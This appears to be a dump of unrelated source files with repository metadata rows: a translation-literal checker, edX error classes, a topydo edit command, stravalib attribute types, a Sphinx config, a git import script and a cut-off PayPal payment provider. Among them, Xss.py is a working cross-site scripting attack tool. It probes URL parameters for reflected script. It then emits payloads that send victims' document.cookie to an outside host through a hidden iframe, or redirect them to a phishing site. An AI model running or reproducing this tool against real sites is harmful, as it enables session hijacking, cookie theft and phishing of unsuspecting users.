if 0 < len(lines):
return ''.join(lines)
else:
return line
def linestrip(line):
# line = re.sub(r'"\s*"', '', line)
line = re.sub(r'\\.', '', line)
line = re.sub(r"'\"'", '', line)
return line
def eligible(line):
line = line.strip('" \t\n')
if re.match(r"^[\.\s\d]*$", line): return False
if re.match(r"^\W*$", line): return False
if re.match(r"^.$", line): return False
return True
ddbg_re = re.compile(r"^.*((IMDBG)|(DDBG)|((std::)?c(err|out)))\s*<<\s*")
dbg_re = re.compile(r"^.*DBG\s*\(.+?\)\s*<<\s*")
dbgexec_re = re.compile(r"^.*DBG_EXEC.*$")
dbgif_re = re.compile(r"^.*DBG_IF.*(\)\s*{)?.*$")
def is_debug(line):
d_obj = ddbg_re.match(line)
if d_obj:
return True
d_obj = dbg_re.match(line)
if d_obj:
return True
d_obj = dbgif_re.match(line)
if d_obj:
return True
d_obj = dbgexec_re.match(line)
if d_obj:
return True
return False
def find_allowed_wrapper(line, start, end):
if is_debug(line[:start]):
return "DBG"
lhp = line.rfind('(', 0, start)
rhp = line.find(')', end) + 1
if 0 < lhp and 0 < rhp:
m_obj = macro_begin.match(line, 0, lhp + 1)
if m_obj:
wrapper = m_obj.group("name")
if allowed_re.match(wrapper):
return wrapper
return find_allowed_wrapper(line, lhp, rhp)
return ""
def do_check(source):
lines = []
lineno = 0
dbg_flag = ''
skip_flag = 0
comment_flag = 0
mismatches = []
for line in iter(open(source)):
lineno += 1
line = line.strip(" \t")
start_comment = line.find("/*")
end_comment = line.rfind("*/")
if -1 != start_comment:
if end_comment < start_comment:
comment_flag = lineno
else:
line = line[:start_comment] + ' '*(end_comment-start_comment) + line[end_comment:]
if -1 != end_comment:
comment_flag = 0
if comment_flag: continue
if stop_skip.match(line):
if not skip_flag:
print >> sys.stderr, "STOP_IGNORE_LITERALS encountered at "\
"line %d when not skipping" % lineno
skip_flag = 0
continue
if start_skip.match(line):
if skip_flag:
print >> sys.stderr, "START_IGNORE_LITERALS encountered "\
"twice at lines %d and %d", skip_flag, lineno
skip_flag = lineno
continue
if skip_flag or skip_re.match(line): continue
line = re.sub(r"\s*//+.*$", "", line)
complete_line_obj = complete_line_re.match(line)
if not complete_line_obj:
lines.append(line)
continue
elif 0 < len(lines):
lines.append(line)
line = ""
for l in lines:
line += l.rstrip('\\\n').strip()
line = linestrip(line)
start = 0
columns = []
for m_obj in literal_re.finditer(line):
if not eligible(m_obj.group("literal")): continue
start = m_obj.start("literal")
wrapper = find_allowed_wrapper(line, start, m_obj.end("literal"))
if 0 < len(wrapper):
continue
columns.append(start)
if len(columns):
mismatches.append((lineno, columns, dump(lines, line), line))
lines = []
cnt = len(mismatches)
if cnt:
for linenum, cols, linedump, complete_line in mismatches:
columns = ','.join([ str(c) for c in cols ])
print "ERROR: Untranslated literal in %s:%d" % (source, linenum)
print " ", linedump
if 0 < skip_flag:
print >> sys.stderr, "Unmatched START_IGNORE_LITERALS in %s:%d" \
% (source, skip_flag)
return cnt
def pathgen(path):
for dp, dlist, flist in os.walk(path):
for src in [ f for f in flist if src_re.match(f) ]:
yield os.path.join(dp, src)
raise StopIteration
if len(sys.argv) < 2:
print "\nUsage: %s <src1> [<src2>..<srcN>]" % sys.argv[0]
print """\
The script checks source files for bare literals which do not appear
as arguments for a set of special macros and functions
To exclude parts of source file from checking, enclose it between
// START_IGNORE_LITERALS
line and
// STOP_IGNORE_LITERALS
line.
Currently all macro and function names that match the regular expression
%s
exclude its bare literal arguments from being reported by this script
""" % allowed_re.pattern
def check(src):
if not src_re.match(src):
return
if not os.path.exists(src):
print >> sys.stderr, "Source file '%s' does not exist" % src
sys.exit(-1)
start = datetime.datetime.now()
cnt = do_check(src)
print "\nStart checking translation of literals ..."
file_count = 0
for src in sys.argv[1:]:
if '@' == src[0]:
for srcfile in file(src[1:], "r").read().strip().split():
check(srcfile)
file_count += 1
elif os.path.isdir(src):
for path in pathgen(src):
check(path)
file_count += 1
else:
check(src)
file_count += 1
print "End checking translation of literals. ", file_count, "file(s) checked\n"
| gpl-3.0 | -4,606,029,231,923,006,000 | 30.321285 | 98 | 0.566868 | false | 3.473942 | false | false | false |
eduNEXT/edx-platform | openedx/core/djangoapps/enrollments/errors.py | 4 | 1532 | """All Error Types pertaining to Enrollment."""
class CourseEnrollmentError(Exception):
"""Generic Course Enrollment Error.
Describes any error that may occur when reading or updating enrollment information for a user or a course.
"""
def __init__(self, msg, data=None):
super().__init__(msg)
# Corresponding information to help resolve the error.
self.data = data
class UserNotFoundError(CourseEnrollmentError):
pass
class CourseEnrollmentClosedError(CourseEnrollmentError):
pass
class CourseEnrollmentFullError(CourseEnrollmentError):
pass
class CourseEnrollmentExistsError(CourseEnrollmentError): # lint-amnesty, pylint: disable=missing-class-docstring
enrollment = None
def __init__(self, message, enrollment):
super().__init__(message)
self.enrollment = enrollment
class CourseModeNotFoundError(CourseEnrollmentError):
"""The requested course mode could not be found."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class EnrollmentNotFoundError(CourseEnrollmentError):
"""The requested enrollment could not be found."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class EnrollmentApiLoadError(CourseEnrollmentError):
"""The data API could not be loaded."""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class InvalidEnrollmentAttribute(CourseEnrollmentError):
"""Enrollment Attributes could not be validated"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
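# Illustrative handling sketch (added for clarity; `enroll` is a hypothetical
# caller, not part of this module):
#
#     try:
#         enroll(user, course_key)
#     except CourseEnrollmentExistsError as err:
#         existing = err.enrollment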
| agpl-3.0 | 9,033,921,829,456,944,000 | 27.90566 | 114 | 0.734334 | false | 4.545994 | false | false | false |
JordiGoPython/Python-Hack-Example | Xss.py | 1 | 1936 | from bs4 import BeautifulSoup
import urllib
import sys
import time
''' Examples
http://kids.britannica.com/search?query=3
http://sonica.speedy.com.ar/resultado_busqueda.php?Tipo=1&Texto=2
--
'''
exploits = ['<script>a=document.cookie;alert(a)</script>',
'<IMG+"""><SCRIPT>alert(document.cookie)<%2FSCRIPT>']
#
PayloadCode=['var a=document.cookie;var ifr = document.createElement("iframe");ifr.src = "http://stackoverflow.com"+a;'+
'document.body.appendChild(ifr);document.getElementsByTagName("iframe")[0].setAttribute("width", "0px");',
'window.location="http://www.newlocation.com";']
Payload = ['<script>'+PayloadCode[0]+'</script>',
'<IMG+"""><SCRIPT>'+PayloadCode[0]+'<%2FSCRIPT>']
PayloadPhish = ['<script>'+PayloadCode[1]+'</script>',
'<IMG+"""><SCRIPT>'+PayloadCode[1]+'<%2FSCRIPT>']
def ConverUrl(array):
url=""
array.pop()
for x in array:
url=url+x+"="
return url
url = [x for x in sys.argv[1:]]
url=[ConverUrl(x.split("=")) for x in url]
def exploit(url):
if len(url)!=0:
ganador=False
index_pay=0
for targets in url:
for exp in exploits:
newtarget=targets + exp
print "Nuevo Target"
print newtarget
contents = urllib.urlopen(newtarget).read()
print "/////////////////////////////"
bs = BeautifulSoup(contents,"lxml")
#print bs.__dict__
#print type(bs.find_all('script'))
scripts=bs.find_all('script')
for src in scripts:
                if src.text.find('alert(') != -1:  # alert() may appear anywhere in the reflected script
print "**************"
                    print 'WINNER: THE WEBSITE IS VULNERABLE XD'
print src
index_pay = exploits.index(exp)
ganador=True
break
if ganador:
            tipo = raw_input("Do phishing (p) or session hijacking (s)? ")
print "**************"
time.sleep(1)
print "PAYLOAD PARA LA WEB"
if tipo=='s':
print targets+Payload[index_pay]
elif tipo=='p':
print targets+PayloadPhish[index_pay]
exploit(url)
| gpl-2.0 | 3,106,751,860,605,959,000 | 27.895522 | 120 | 0.621384 | false | 2.933333 | false | false | false |
berkayaslan/Ornek_Algoritma_Cozumu | Kod_Dunyasi_Akademik_Soru/Cozumler/BtoAsalSayi/btoasal.py | 1 | 1160 | #! /usr/env/python3
import time as t
import Bolenler
"""
Kullanicidan alinan bir sayinin basamaklari ile yazilabilecek tum
asal sayilarin adedini ekrana yazdiran fonksiyon M() olsun.
__ORNEK:__
M(127):
| 2 | 7 | 17 | 71 | 127 | 271 |
= 6
__CIKTI:__
100.000'e kadar olan sayilar icinde M() fonksiyonundan en buyuk
sayiyi donduren sayi kactir?
-----------------------------------------------------------------------
Sayi olarak bakmak yerine string olarak bakmaliyim.
***
ba = t.time()
x = Bolenler().asalSayilar(9999)
k = []
for i in x:
li = [j for j in str(i)]
li.sort()
k.append(li)
foo = 0
for foo in range(9999):
li2 = [j for j in str(foo)]
li2.sort()
temp=x.count(li2)
print(li2)
print(temp)
bi=t.time()
print(bi-ba)
***
"""
from collections import Counter

# Bolenler.asalSayilar is assumed to return all primes below the given bound.
asallar = Bolenler.asalSayilar(100000)
asal_basamak = [Counter(str(p)) for p in asallar]  # digit multiset of each prime

def m(sayi: int) -> int:
    """Count the primes that can be written with the digits of `sayi`."""
    basamaklar = Counter(str(sayi))
    adet = 0
    for p_basamak in asal_basamak:
        # A prime qualifies if it never uses a digit more often than `sayi` has it.
        if all(basamaklar[b] >= n for b, n in p_basamak.items()):
            adet += 1
    return adet

sure1 = t.time()  # start time
en_iyi_sayi, en_iyi = None, -1
for i in range(100000):
    adet = m(i)
    if adet > en_iyi:
        en_iyi_sayi, en_iyi = i, adet
sure2 = t.time()  # end time
print(en_iyi_sayi, en_iyi)
print(sure2-sure1) | gpl-3.0 | 1,046,352,658,180,883,800 | 14.077922 | 71 | 0.589655 | false | 2.33871 | false | false | false |
mruwek/topydo | topydo/lib/EditCommand.py | 1 | 5712 | # Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 Bram Schoenmakers <me@bramschoenmakers.nl>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from subprocess import call, check_call, CalledProcessError
import tempfile
from topydo.lib.ListCommand import ListCommand
from topydo.lib.MultiCommand import MultiCommand
from topydo.lib.Config import config
from topydo.lib.Todo import Todo
from topydo.lib.TodoListBase import InvalidTodoException
from topydo.lib.TodoList import TodoList
from topydo.lib.PrettyPrinterFilter import PrettyPrinterNumbers
class EditCommand(MultiCommand, ListCommand):
def __init__(self, p_args, p_todolist, p_output, p_error, p_input):
super(EditCommand, self).__init__(p_args, p_todolist, p_output,
p_error, p_input)
self.is_expression = False
self.edit_archive = False
def _process_flags(self):
opts, args = self.getopt('xed')
for opt, value in opts:
if opt == '-d':
self.edit_archive = True
elif opt == '-x':
self.show_all = True
elif opt == '-e':
self.is_expression = True
self.args = args
def _todos_to_temp(self):
f = tempfile.NamedTemporaryFile()
for todo in self.todos:
f.write("%s\n" % todo.__str__())
f.seek(0)
return f
def _todos_from_temp(self, temp_file):
temp_file.seek(0)
todos = temp_file.read().splitlines()
todo_objs = []
for todo in todos:
todo_objs.append(Todo(todo))
return todo_objs
def _open_in_editor(self, temp_file, editor):
try:
return check_call([editor, temp_file.name])
except(CalledProcessError):
self.error('Something went wrong in the editor...')
return 1
def _catch_todo_errors(self):
errors = []
if len(self.invalid_numbers) > 1 or len(self.invalid_numbers) > 0 and len(self.todos) > 0:
for number in self.invalid_numbers:
errors.append("Invalid todo number given: {}.".format(number))
elif len(self.invalid_numbers) == 1 and len(self.todos) == 0:
errors.append("Invalid todo number given.")
if len(errors) > 0:
return errors
else:
return None
def execute(self):
if not super(ListCommand, self).execute():
return False
self.printer.add_filter(PrettyPrinterNumbers(self.todolist))
try:
editor = os.environ['EDITOR'] or 'vi'
except(KeyError):
editor = 'vi'
try:
if len(self.args) < 1:
todo = config().todotxt()
return call([editor, todo]) == 0
else:
self._process_flags()
if self.edit_archive:
archive = config().archive()
return call([editor, archive]) == 0
if self.is_expression:
self.todos = self._view()._viewdata
else:
self.get_todos(self.args)
todo_errors = self._catch_todo_errors()
if not todo_errors:
temp_todos = self._todos_to_temp()
if not self._open_in_editor(temp_todos, editor):
new_todos = self._todos_from_temp(temp_todos)
if len(new_todos) == len(self.todos):
for todo in self.todos:
super(TodoList, self.todolist).delete(todo)
for todo in new_todos:
self.todolist.add_todo(todo)
self.out(self.printer.print_todo(todo))
else:
self.error('Number of edited todos is not equal to '
'number of supplied todo IDs.')
else:
self.error(self.usage())
else:
for error in todo_errors:
self.error(error)
except(OSError):
self.error('There is no such editor as: ' + editor + '. '
'Check your $EDITOR and/or $PATH')
def usage(self):
return """Synopsis:
edit
edit <NUMBER1> [<NUMBER2> ...]
edit -e [-x] [expression]
edit -d"""
def help(self):
return """\
Launches a text editor to edit todos.
Without any arguments it will just open the todo.txt file. Alternatively it can
edit todo item(s) with the given number(s) or edit relevant todos matching
the given expression. See `topydo help ls` for more information on relevant
todo items. It is also possible to open the archive file.
By default it will use $EDITOR in your environment, otherwise it will fall back
to 'vi'.
-e : Treat the subsequent arguments as an expression.
-x : Edit *all* todos matching the expression (i.e. do not filter on
dependencies or relevance).
-d : Open the archive file.
"""
| gpl-3.0 | 6,091,048,701,608,074,000 | 33.409639 | 98 | 0.57563 | false | 4.091691 | false | false | false |
hozn/stravalib | stravalib/attributes.py | 1 | 12153 | """
Attribute types used for the model.
The types system provides a mechanism for serializing/unserializing the data to/from JSON
structures and for capturing additional information about the model attributes.
"""
from __future__ import division, absolute_import, print_function, unicode_literals
import logging
from datetime import datetime, timedelta, tzinfo, date
from collections import namedtuple
from weakref import WeakKeyDictionary, WeakValueDictionary
import arrow
import pytz
from units.quantity import Quantity
import six
import stravalib.model
# Depending on the type of request, objects will be returned in meta, summary or detailed representations. The
# representation of the returned object is indicated by the resource_state attribute.
# (For more info, see https://strava.github.io/api/)
META = 1
SUMMARY = 2
DETAILED = 3
class Attribute(object):
"""
Base descriptor class for a Strava model attribute.
"""
_type = None
def __init__(self, type_, resource_states=None, units=None):
self.log = logging.getLogger('{0.__module__}.{0.__name__}'.format(self.__class__))
self.type = type_
self.resource_states = resource_states
self.data = WeakKeyDictionary()
self.units = units
def __get__(self, obj, clazz):
if obj is not None:
# It is being called on an object (not class)
# This can cause infinite loops, when we're attempting to get the resource_state attribute ...
#if hasattr(clazz, 'resource_state') \
# and obj.resource_state is not None \
# and not obj.resource_state in self.resource_states:
# raise AttributeError("attribute required resource state not satisfied by object")
return self.data.get(obj)
else:
# Rather than return the wrapped value, return the actual descriptor object
return self
def __set__(self, obj, val):
if val is not None:
self.data[obj] = self.unmarshal(val)
else:
self.data[obj] = None
@property
def type(self):
return self._type
@type.setter
def type(self, v):
self._type = v
def marshal(self, v):
"""
Turn this value into format for wire (JSON).
(By default this will just return the underlying object; subclasses
can override for specific behaviors -- e.g. date formatting.)
"""
if isinstance(v, Quantity):
return v.num
else:
return v
def unmarshal(self, v):
"""
Convert the value from parsed JSON structure to native python representation.
By default this will leave the value as-is since the JSON parsing routines
typically convert to native types. The exception may be date strings or other
more complex types, where subclasses will override this behavior.
"""
if self.units:
# Note that we don't want to cast to type in this case!
if not isinstance(v, Quantity):
v = self.units(v)
elif not isinstance(v, self.type):
v = self.type(v)
return v
class DateAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(DateAttribute, self).__init__(date, resource_states=resource_states)
def marshal(self, v):
"""
:param v: The date object to convert.
:type v: date
:return:
"""
return v.isoformat() if v else None
def unmarshal(self, v):
"""
Convert a date in "2012-12-13" format to a :class:`datetime.date` object.
"""
if not isinstance(v, date):
# 2012-12-13
v = datetime.strptime(v, "%Y-%m-%d").date()
return v
class TimestampAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None, tzinfo=pytz.utc):
super(TimestampAttribute, self).__init__(datetime, resource_states=resource_states)
self.tzinfo = tzinfo
def marshal(self, v):
"""
Serialize the timestamp to string.
:param v: The timestamp.
:type v: datetime
:return: The serialized date time.
"""
return v.isoformat() if v else None
def unmarshal(self, v):
"""
Convert a timestamp in "2012-12-13T03:43:19Z" format to a `datetime.datetime` object.
"""
if not isinstance(v, datetime):
if isinstance(v, six.integer_types):
v = arrow.get(v)
else:
try:
# Most dates are in this format 2012-12-13T03:43:19Z
v = datetime.strptime(v, "%Y-%m-%dT%H:%M:%SZ")
except ValueError:
# ... but not all.
v = arrow.get(v).datetime
# Translate to specified TZ
v = v.replace(tzinfo=self.tzinfo)
return v
LatLon = namedtuple('LatLon', ['lat', 'lon'])
class LocationAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(LocationAttribute, self).__init__(LatLon, resource_states=resource_states)
def marshal(self, v):
"""
Turn this value into format for wire (JSON).
:param v: The lat/lon.
:type v: LatLon
:return: Serialized format.
:rtype: str
"""
return "{lat},{lon}".format(lat=v.lat, lon=v.lon) if v else None
def unmarshal(self, v):
"""
"""
if not isinstance(v, LatLon):
v = LatLon(lat=v[0], lon=v[1])
return v
class TimezoneAttribute(Attribute):
"""
"""
def __init__(self, resource_states=None):
super(TimezoneAttribute, self).__init__(pytz.timezone, resource_states=resource_states)
def unmarshal(self, v):
"""
        Convert a timezone in the format "(GMT-08:00) America/Los_Angeles" to
        a `pytz.timezone` object.
"""
if not isinstance(v, tzinfo):
# (GMT-08:00) America/Los_Angeles
tzname = v.split(' ', 1)[1]
v = pytz.timezone(tzname)
return v
def marshal(self, v):
"""
Serialize time zone name.
:param v: The timezone.
:type v: tzdata
:return: The name of the time zone.
"""
return str(v) if v else None
class TimeIntervalAttribute(Attribute):
"""
Handles time durations, assumes upstream int value in seconds.
"""
def __init__(self, resource_states=None):
super(TimeIntervalAttribute, self).__init__(int, resource_states=resource_states)
def unmarshal(self, v):
"""
Convert the value from parsed JSON structure to native python representation.
By default this will leave the value as-is since the JSON parsing routines
typically convert to native types. The exception may be date strings or other
more complex types, where subclasses will override this behavior.
"""
if not isinstance(v, timedelta):
v = timedelta(seconds=v)
return v
def marshal(self, v):
"""
        Serialize the time interval to string.
        :param v: The time interval.
        :type v: timedelta
        :return: The string representation of the interval (e.g. '1:00:00').
"""
return str(v) if v else None
class ChoicesAttribute(Attribute):
"""
Attribute where there are several choices the attribute may take.
Allows conversion from the API value to a more helpful python value.
"""
def __init__(self, *args, **kwargs):
self.choices = kwargs.pop("choices", {})
super(ChoicesAttribute, self).__init__(*args, **kwargs)
def marshal(self, v):
"""
Turn this value into API format.
Do a reverse dictionary lookup on choices to find the original value. If
there are no keys or too many keys for now we raise a NotImplementedError
as marshal is not used anywhere currently. In the future we will want to
fail gracefully.
"""
if v:
orig = [i for i in self.choices if self.choices[i] == v]
if len(orig) == 1:
return orig[0]
elif len(orig) == 0:
# No such choice
raise NotImplementedError("No such reverse choice {0} for field {1}.".format(v, self))
else:
# Too many choices. We could return one possible choice (e.g. orig[0]).
raise NotImplementedError("Too many reverse choices {0} for value {1} for field {2}".format(orig, v, self))
def unmarshal(self, v):
"""
Convert the value from Strava API format to useful python representation.
If the value does not appear in the choices attribute we log an error rather
than raising an exception as this may be caused by a change to the API upstream
so we want to fail gracefully.
"""
try:
return self.choices[v]
except KeyError:
self.log.warning("No such choice {0} for field {1}.".format(v, self))
# Just return the value from the API
return v
class EntityAttribute(Attribute):
"""
Attribute for another entity.
"""
_lazytype = None
def __init__(self, *args, **kwargs):
super(EntityAttribute, self).__init__(*args, **kwargs)
self.bind_clients = WeakKeyDictionary()
@property
def type(self):
if self._lazytype:
clazz = getattr(stravalib.model, self._lazytype)
else:
clazz = self._type
return clazz
@type.setter
def type(self, v):
if isinstance(v, (six.text_type, six.binary_type)):
# Supporting lazy class referencing
self._lazytype = v
else:
self._type = v
def __set__(self, obj, val):
if val is not None:
# If the "owning" object has a bind_client set, we want to pass that
# down into the objects we are deserializing here
self.data[obj] = self.unmarshal(val, bind_client=getattr(obj, 'bind_client', None))
else:
self.data[obj] = None
def marshal(self, v):
"""
Turn an entity into a dictionary.
:param v: The entity to serialize.
:type v: stravalib.model.BaseEntity
:return: Dictionary of attributes
:rtype: Dict[str, Any]
"""
return v.to_dict() if v else None
def unmarshal(self, value, bind_client=None):
"""
Cast the specified value to the entity type.
"""
#self.log.debug("Unmarshall {0!r}: {1!r}".format(self, value))
if not isinstance(value, self.type):
o = self.type()
if bind_client is not None and hasattr(o.__class__, 'bind_client'):
o.bind_client = bind_client
if isinstance(value, dict):
for (k, v) in value.items():
if not hasattr(o.__class__, k):
self.log.warning("Unable to set attribute {0} on entity {1!r}".format(k, o))
else:
#self.log.debug("Setting attribute {0} on entity {1!r}".format(k, o))
setattr(o, k, v)
value = o
else:
raise Exception("Unable to unmarshall object {0!r}".format(value))
return value
class EntityCollection(EntityAttribute):
def marshal(self, values):
"""
Turn a list of entities into a list of dictionaries.
:param values: The entities to serialize.
:type values: List[stravalib.model.BaseEntity]
:return: List of dictionaries of attributes
:rtype: List[Dict[str, Any]]
"""
if values is not None:
return [super(EntityCollection, self).marshal(v) for v in values]
def unmarshal(self, values, bind_client=None):
"""
Cast the list.
"""
if values is not None:
return [super(EntityCollection, self).unmarshal(v, bind_client=bind_client) for v in values]
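# --- Hedged illustration (added; not from the original module): how these
# descriptors are typically declared on an entity class. `BaseEntity` and
# `meters` stand in for the real stravalib definitions.
#
#     class Ride(BaseEntity):
#         name = Attribute(six.text_type, (SUMMARY, DETAILED))
#         distance = Attribute(float, (SUMMARY, DETAILED), units=meters)
#         start_date = TimestampAttribute((SUMMARY, DETAILED))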
| apache-2.0 | 3,031,039,495,121,664,000 | 31.065963 | 123 | 0.581667 | false | 4.228601 | false | false | false |
mrgaaron/docs | source/conf.py | 1 | 4722 | # -*- coding: utf-8 -*-
#
# TempoIQ Manual documentation build configuration file
#
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('sphinxext'))
# -- General configuration ------------------------------------------------
html_context = {
# Github info for generating source links in documents
'gh_repository': 'TempoIQ/docs',
'gh_branch': 'master',
'display_github': True
}
# For development builds, invoke sphinx-build with '-t dev'.
if not tags.has('dev'):
tags.add('publish')
html_context['publish'] = True
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'tempoiq_sphinx',
'snippets',
'redirect'
]
# List of valid snippet languages.
snippet_language_list = [
{
'key': 'python',
'name': 'Python',
'local_file': 'includes/python_snippets.py',
#'gh_repository': 'TempoIQ/tempoiq-python',
#'gh_branch': 'master',
#'gh_path': 'tests/test_snippets.py',
'line_comment': '#'
},
{
'key': 'node',
'name': 'Node.js',
'highlight': 'javascript',
'gh_repository': 'TempoIQ/tempoiq-node-js',
'gh_branch': 'master',
'gh_path': 'test/test_snippets.js',
'line_comment': '//'
},
{
'key': 'ruby',
'name': 'Ruby',
'local_file': 'includes/ruby_snippets.rb',
'line_comment': '#'
},
{
'key': 'java',
'name': 'Java',
'gh_repository': 'TempoIQ/tempoiq-java',
'gh_branch': 'master',
'gh_path': 'src/integration-test/java/com/tempoiq/Snippets.java',
'line_comment': '//'
},
{
'key': 'csharp',
'name': 'C#/.NET',
'local_file': 'includes/csharp_snippets.cs',
'line_comment': '//'
},
{
'key': 'http',
'name': 'HTTP',
'highlight': 'bash',
'line_comment': '#',
'local_file': 'includes/http_snippets.txt'
}
]
# Name of the default domain.
primary_domain = 'tempoiq'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'toc-main'
# A list of (type, target) tuples (by default empty) that should be ignored
# when generating warnings in “nitpicky mode”
nitpick_ignore = [
('tempoiq:class', 'String')
]
# General information about the project.
project = u'Documentation'
copyright = u'2015 TempoIQ Inc'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['includes/*']
# Include TODO directives in the output. Turn off for publishing in prod
if tags.has('dev'):
todo_include_todos = True
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Default language for syntax highlighting
highlight_language = 'javascript'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'tempoiq_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["themes"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "TempoIQ documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
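# --- Hedged illustration (assumption, not from the source): a sketch of
# how a snippet extension might resolve each snippet_language_list entry
# above to a source location, preferring a local file over a GitHub
# path. The helper name `snippet_source` is hypothetical.
def snippet_source(lang):
    if 'local_file' in lang:
        return lang['local_file']
    return '{gh_repository}@{gh_branch}:{gh_path}'.format(**lang)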
| mit | -4,601,533,543,413,347,000 | 27.768293 | 79 | 0.639678 | false | 3.618098 | true | false | false |
chfoo/cloaked-octo-nemesis | areca-backup/git_fast_import.py | 1 | 2476 | import glob
import json
import zipfile
import tarfile
import os
import sys
import arrow
def main():
data_dir = 'data/'
infos = []
for info_filename in glob.glob(data_dir + '/*/info.json'):
with open(info_filename) as file:
info = json.loads(file.read())
info['date'] = arrow.get(info['date'])
infos.append(info)
infos = sorted(infos, key=lambda d:d['date'])
out_write = sys.stdout.write
def out_bwrite(data):
sys.stdout.flush()
sys.stdout.buffer.write(data)
sys.stdout.flush()
for info in infos:
dirname = os.path.join(data_dir, info['slug'])
for filename in glob.glob(dirname + '/*src*'):
archive_filename = filename
break
else:
raise Exception('Cannot find archive file.')
sys.stderr.write('=== {}\n'.format(info['slug']))
def get_files():
if archive_filename.endswith('zip'):
file = zipfile.ZipFile(archive_filename)
for name in file.namelist():
if name.startswith('areca-'):
fixed_name = name.split('/', 1)[-1].replace('//', '/')
else:
fixed_name = name
if not name.endswith('/'):
yield fixed_name, file.read(name)
else:
file = tarfile.open(archive_filename)
for name in file.getnames():
try:
yield name, file.extractfile(name).read()
except AttributeError:
# Not a file
pass
out_write('commit refs/heads/master\n')
out_write('committer Areca Backup <> {} +0000\n'.format(info['date'].timestamp))
commit_message = 'Release {}'.format(info['slug']).encode()
out_write('data {}\n'.format(len(commit_message)))
out_bwrite(commit_message)
out_write('\n')
out_write('deleteall\n')
for filename, data in get_files():
out_write('M 644 inline {}\n'.format(filename))
out_write('data {}\n'.format(len(data)))
out_bwrite(data)
out_write('\n')
out_write('\n')
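# --- Illustrative note (assumption, not taken from the source): the
# stream written above follows git's fast-import format. For a single
# release it looks roughly like this (byte counts and dates made up):
#
#   commit refs/heads/master
#   committer Areca Backup <> 1234567890 +0000
#   data 21
#   Release areca-7.1.6
#   deleteall
#   M 644 inline src/Foo.java
#   data 42
#   ...file contents...
#
# The output is intended to be piped into `git fast-import` inside an
# empty repository.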
if __name__ == '__main__':
main() | gpl-3.0 | 5,252,097,189,589,740,000 | 28.488095 | 88 | 0.476171 | false | 4.485507 | false | false | false |
awg24/pretix | src/pretix/plugins/paypal/payment.py | 3 | 9967 | import json
import logging
from collections import OrderedDict
import paypalrestsdk
from django import forms
from django.contrib import messages
from django.template.loader import get_template
from django.utils.translation import ugettext as __, ugettext_lazy as _
from pretix.base.models import Quota
from pretix.base.payment import BasePaymentProvider
from pretix.base.services.orders import mark_order_paid
from pretix.helpers.urls import build_absolute_uri
logger = logging.getLogger('pretix.plugins.paypal')
class Paypal(BasePaymentProvider):
identifier = 'paypal'
verbose_name = _('PayPal')
payment_form_fields = OrderedDict([
])
@property
def settings_form_fields(self):
return OrderedDict(
list(super().settings_form_fields.items()) + [
('endpoint',
forms.ChoiceField(
label=_('Endpoint'),
initial='live',
choices=(
('live', 'Live'),
('sandbox', 'Sandbox'),
),
)),
('client_id',
forms.CharField(
label=_('Client ID'),
)),
('secret',
forms.CharField(
label=_('Secret'),
))
]
)
def init_api(self):
paypalrestsdk.set_config(
mode="sandbox" if "sandbox" in self.settings.get('endpoint') else 'live',
client_id=self.settings.get('client_id'),
client_secret=self.settings.get('secret'))
def payment_is_valid_session(self, request):
return (request.session.get('payment_paypal_id', '') != ''
and request.session.get('payment_paypal_payer', '') != '')
def payment_form_render(self, request) -> str:
template = get_template('pretixplugins/paypal/checkout_payment_form.html')
ctx = {'request': request, 'event': self.event, 'settings': self.settings}
return template.render(ctx)
def checkout_prepare(self, request, cart):
self.init_api()
items = []
for cp in cart['positions']:
items.append({
"name": cp.item.name,
"description": str(cp.variation) if cp.variation else "",
"quantity": cp.count,
"price": str(cp.price),
"currency": request.event.currency
})
if cart['payment_fee']:
items.append({
"name": __('Payment method fee'),
"description": "",
"quantity": 1,
"currency": request.event.currency,
"price": str(cart['payment_fee'])
})
payment = paypalrestsdk.Payment({
'intent': 'sale',
'payer': {
"payment_method": "paypal",
},
"redirect_urls": {
"return_url": build_absolute_uri('plugins:paypal:return'),
"cancel_url": build_absolute_uri('plugins:paypal:abort'),
},
"transactions": [
{
"item_list": {
"items": items
},
"amount": {
"currency": request.event.currency,
"total": str(cart['total'])
},
"description": __('Event tickets for %s') % request.event.name
}
]
})
